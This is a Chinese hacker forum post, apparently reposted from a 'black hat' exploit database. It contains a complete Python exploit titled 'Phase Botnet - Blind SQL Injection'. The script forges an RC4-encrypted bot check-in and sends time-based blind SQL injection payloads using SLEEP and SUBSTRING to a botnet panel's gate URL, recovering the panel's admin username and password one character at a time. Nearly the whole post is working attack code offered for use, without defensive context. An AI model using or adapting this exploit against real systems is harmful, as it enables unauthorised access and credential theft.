跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Phase Botnet - Blind SQL Injection

Ken1Ve
Ken1Ve
黑帽漏洞数据库

精选回复

发布于 
import requests
import time
import sys
 
wait_delay = 5 #Depending on connection delay and server speed, you may need to make this a larger number
KnockString = 'g=a&w=a&b=a&d=a&p=a&m=a' #lol no integrity verification
 
PostData = ""
 
def rc4_crypt(data , key):
		S = list(range(256))
		j = 0
		out = []
 
		for i in range(256):
				j = (j + S[i] + ord( key[i % len(key)] )) % 256
				S[i] , S[j] = S[j] , S[i]
 
		i = j = 0
		for char in data:
				i = ( i + 1 ) % 256
				j = ( j + S[i] ) % 256
				S[i] , S[j] = S[j] , S[i]
				out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))    
		return ''.join(out)
 
def brute_length(url, id):
		for i in range(0, 30):
				Injection = "\"', (IF(LENGTH((SELECT value FROM settings WHERE id='%d')) = %d, SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, i, wait_delay)
				ConnectUrl  = url + '?i=' + Injection
 
				start = time.time()
				r = requests.post(ConnectUrl, data=PostData, headers='')
				end = time.time()
 
				if((end - start) >= wait_delay):
						return i
					   
		return 0
	   
def brute_char(url, position, id):
		sys.stdout.write(" ")
		sys.stdout.flush()
					   
		for i in range(32, 127):
				Injection = "\"', (IF(SUBSTRING((SELECT value FROM settings WHERE id='%d'), %d, 1) = BINARY CHAR(%d), SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, position, i, wait_delay)
				ConnectUrl  = url + '?i=' + Injection
			   
				sys.stdout.write("\b%c" % chr(i))
				sys.stdout.flush()
			   
				start = time.time()
				r = requests.post(ConnectUrl, data=PostData, headers='')
				end = time.time()
 
				if((end - start) >= wait_delay):
						break
 
def brute_panel(url):
		global KnockString, PostData
	   
		PostData = 'aaaa' + rc4_crypt(KnockString, 'aaaa')
	   
		print"Username: ",;
		sys.stdout.flush()
		ulen = brute_length(url, 1)
	   
		for i in range(1, ulen+1):
				brute_char(url, i, 1)
 
		print"\nPassword: ",
		sys.stdout.flush()
		plen = brute_length(url, 2)
	   
		for i in range(1, plen+1):
				brute_char(url, i, 2)
		print""
 
if(len(sys.argv) >= 2):
		brute_panel(sys.argv[1])
else:
		print("enter panel gate url")

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。